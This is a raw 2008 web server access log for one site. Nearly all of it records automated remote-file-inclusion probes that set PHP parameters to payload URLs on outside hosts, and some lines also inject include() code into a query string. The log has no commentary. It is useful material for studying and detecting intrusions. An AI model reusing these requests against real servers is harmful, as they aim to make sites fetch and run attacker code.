203.228.242.67 - - [29/Nov/2008:09:42:52 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://shellrack.t35.com/ide.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.228.242.67 - - [29/Nov/2008:09:42:52 -0800] "GET /logs/access_081008.log//index.php?DOCUMENT_ROOT=http://shellrack.t35.com/ide.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.228.242.67 - - [29/Nov/2008:09:42:53 -0800] "GET /index.php?DOCUMENT_ROOT=http://shellrack.t35.com/ide.txt???? HTTP/1.1" 200 94714 "-" "libwww-perl/5.65" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:43:02 -0800] "GET /logs//com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:43:02 -0800] "GET /com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:43:02 -0800] "GET /logs/access_080719.log%20//com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:43:06 -0800] "GET /com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:43:06 -0800] "GET /logs//com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:43:06 -0800] "GET /logs/access_080704.log//com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.178 - - [29/Nov/2008:09:43:07 -0800] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.12.178 - - [29/Nov/2008:09:43:07 -0800] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.12.178 - - [29/Nov/2008:09:43:07 -0800] "GET /logs/access_080617.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:09:43:12 -0800] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://www.csjh.tpc.edu.tw/~sw/board/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:09:43:12 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.csjh.tpc.edu.tw/~sw/board/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:09:43:12 -0800] "GET /logs/access_080711.log//appserv/main.php?appserv_root=http://www.csjh.tpc.edu.tw/~sw/board/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:09:43:12 -0800] "GET /appserv/main.php?appserv_root=http://www.csjh.tpc.edu.tw/~sw/board/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
218.38.12.178 - - [29/Nov/2008:09:43:14 -0800] "GET /logs/access_080629.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.154.47 - - [29/Nov/2008:09:43:20 -0800] "GET /logs/access_080330.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:43:23 -0800] "GET /logs/access_080719.log//com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.176.67.220 - - [29/Nov/2008:09:43:58 -0800] "GET /logs/access_080406.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.geocities.com/pertaminux/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:43:59 -0800] "GET /logs/access_080704.log//com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:44:13 -0800] "GET /logs/access_080719.log//com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:09:44:22 -0800] "GET /logs/access_080522.log//?mosConfig_absolute_path=http://h1.ripway.com/xdedzx/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:09:44:22 -0800] "GET /logs//?mosConfig_absolute_path=http://h1.ripway.com/xdedzx/id1.txt?? HTTP/1.1" 200 75743 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:09:44:23 -0800] "GET /?mosConfig_absolute_path=http://h1.ripway.com/xdedzx/id1.txt?? HTTP/1.1" 200 94739 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.154.47 - - [29/Nov/2008:09:44:25 -0800] "GET /logs/access_080313.log/?sourcedir=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.54.16.82 - - [29/Nov/2008:09:44:26 -0800] "GET /logs/access_080427.log/lostpasswd.php?env[include_prefix]=http://sior.org/zero/build/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.16.82 - - [29/Nov/2008:09:44:27 -0800] "GET /lostpasswd.php?env[include_prefix]=http://sior.org/zero/build/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.16.82 - - [29/Nov/2008:09:44:27 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://sior.org/zero/build/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:09:44:27 -0800] "GET /logs/access_080401.log//?mosConfig_absolute_path=http://h1.ripway.com/xdedzx/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.67.220 - - [29/Nov/2008:09:44:30 -0800] "GET /logs/access_080726.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.geocities.com/pertaminux/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:09:45:07 -0800] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:09:45:07 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:09:45:07 -0800] "GET /appserv/main.php?appserv_root=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:09:45:07 -0800] "GET /logs/access_080711.log//appserv/main.php?appserv_root=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:45:10 -0800] "GET /logs/access_080401.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:45:10 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:45:11 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.78.215 - - [29/Nov/2008:09:45:41 -0800] "GET /logs/access_070912.log HTTP/1.0" 200 65147 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:45:53 -0800] "GET /logs/access_080521.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.247.226.253 - - [29/Nov/2008:09:45:58 -0800] "GET /logs/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.247.226.253 - - [29/Nov/2008:09:45:58 -0800] "GET /errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
90.156.145.189 - - [29/Nov/2008:09:46:32 -0800] "GET /logs/access.log//?DOCUMENT_ROOT=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:46:32 -0800] "GET /logs/access_081117.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:46:33 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:46:33 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.238.163.25 - - [29/Nov/2008:09:46:46 -0800] "GET /logs/access_080816.log//pjsfiles/modify.php?installed_config_file=http://www.anderlechtenforme.be//id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.238.163.25 - - [29/Nov/2008:09:46:47 -0800] "GET /logs/access_080816.log//pjsfiles/modify.php?installed_config_file=http://www.anderlechtenforme.be//id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.238.163.25 - - [29/Nov/2008:09:46:51 -0800] "GET /pjsfiles/modify.php?installed_config_file=http://www.anderlechtenforme.be//id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.238.163.25 - - [29/Nov/2008:09:46:52 -0800] "GET /pjsfiles/modify.php?installed_config_file=http://www.anderlechtenforme.be//id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.238.163.25 - - [29/Nov/2008:09:46:57 -0800] "GET /logs//pjsfiles/modify.php?installed_config_file=http://www.anderlechtenforme.be//id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.16.82 - - [29/Nov/2008:09:46:57 -0800] "GET /logs/access_080408.log/lostpasswd.php?env[include_prefix]=http://sior.org/zero/build/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.238.163.25 - - [29/Nov/2008:09:46:57 -0800] "GET /logs//pjsfiles/modify.php?installed_config_file=http://www.anderlechtenforme.be//id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:47:08 -0800] "GET /logs/access_080912.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.117.252.226 - - [29/Nov/2008:09:47:09 -0800] "GET /logs/access_080515.log/errors.php?error=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.18.240.2 - - [29/Nov/2008:09:47:16 -0800] "GET /logs/access_080402.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.kuiwa.at/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:47:21 -0800] "GET /logs/access_080209.log//modules/4nAlbum/public/displayCategory.php?basepath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:47:21 -0800] "GET /logs/access_080506.log//modules/4nAlbum/public/displayCategory.php?basepath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:47:21 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:47:21 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.72.170 - - [29/Nov/2008:09:47:26 -0800] "GET /logs/access_080903.log///index.php?_SERVER[DOCUMENT_ROOT]=http://www.djpbn-jateng.go.id/chat/sc.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.54.16.82 - - [29/Nov/2008:09:47:28 -0800] "GET /logs/access_080412.log/lostpasswd.php?env[include_prefix]=http://sior.org/zero/build/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.67.75 - - [29/Nov/2008:09:47:57 -0800] "GET /logs/access_080618.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.75 - - [29/Nov/2008:09:47:58 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.75 - - [29/Nov/2008:09:47:58 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:48:01 -0800] "GET /logs/access_080719.log%20//com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:48:06 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:48:06 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:48:06 -0800] "GET /logs/access_080508.log%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:48:15 -0800] "GET /logs/access_080329.log%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.67.220 - - [29/Nov/2008:09:48:15 -0800] "GET /logs/access_080406.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.geocities.com/pertaminux/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.161.184.100 - - [29/Nov/2008:09:48:27 -0800] "GET /logs/?mosConfig_absolute_path=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 200 75738 "-" "libwww-perl/5.810" "www.dmulk.com"
205.161.184.100 - - [29/Nov/2008:09:48:29 -0800] "GET /?mosConfig_absolute_path=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 200 94830 "-" "libwww-perl/5.810" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:48:30 -0800] "GET /logs/access_081106.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:48:30 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:48:30 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:48:30 -0800] "GET /logs/access_080506.log//modules/4nAlbum/public/displayCategory.php?basepath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:48:30 -0800] "GET /logs/access_080209.log//modules/4nAlbum/public/displayCategory.php?basepath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:48:30 -0800] "GET /logs/access_081104.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:48:30 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:48:31 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 200 95203 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:48:34 -0800] "GET /logs/access_081104.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:48:35 -0800] "GET /logs/access_081106.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:48:35 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:48:35 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 200 95203 "-" "libwww-perl/5.79" "www.dmulk.com"
81.176.67.220 - - [29/Nov/2008:09:48:44 -0800] "GET /logs/access_080726.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.geocities.com/pertaminux/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.18.240.2 - - [29/Nov/2008:09:48:55 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.kuiwa.at/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.228.242.67 - - [29/Nov/2008:09:49:20 -0800] "GET /logs/access_080908.log//index.php?DOCUMENT_ROOT=http://shellrack.t35.com/ide.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.75.68.8 - - [29/Nov/2008:09:49:28 -0800] "GET /logs/access_080816.log//pjsfiles/modify.php?installed_config_file=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.75.68.8 - - [29/Nov/2008:09:49:40 -0800] "GET /pjsfiles/modify.php?installed_config_file=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.75.68.8 - - [29/Nov/2008:09:49:41 -0800] "GET /logs//pjsfiles/modify.php?installed_config_file=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.75.68.8 - - [29/Nov/2008:09:49:50 -0800] "GET /logs/access_080816.log%20//pjsfiles/modify.php?installed_config_file= HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:51:20 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:51:21 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.161.184.100 - - [29/Nov/2008:09:51:24 -0800] "GET /logs/access_080525.log/?mosConfig_absolute_path=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.161.184.100 - - [29/Nov/2008:09:51:24 -0800] "GET /logs/access_080507.log/?mosConfig_absolute_path=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
90.156.145.189 - - [29/Nov/2008:09:51:24 -0800] "GET /logs/access.log//?DOCUMENT_ROOT=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:51:34 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:51:35 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
90.156.145.189 - - [29/Nov/2008:09:51:36 -0800] "GET /logs/access_081107.log//?DOCUMENT_ROOT=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:51:46 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:51:47 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:51:51 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:51:52 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:52:11 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:52:12 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:52:12 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:52:12 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.78.215 - - [29/Nov/2008:09:52:18 -0800] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.219.198.195 - - [29/Nov/2008:09:52:18 -0800] "GET /logs/access_081117.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
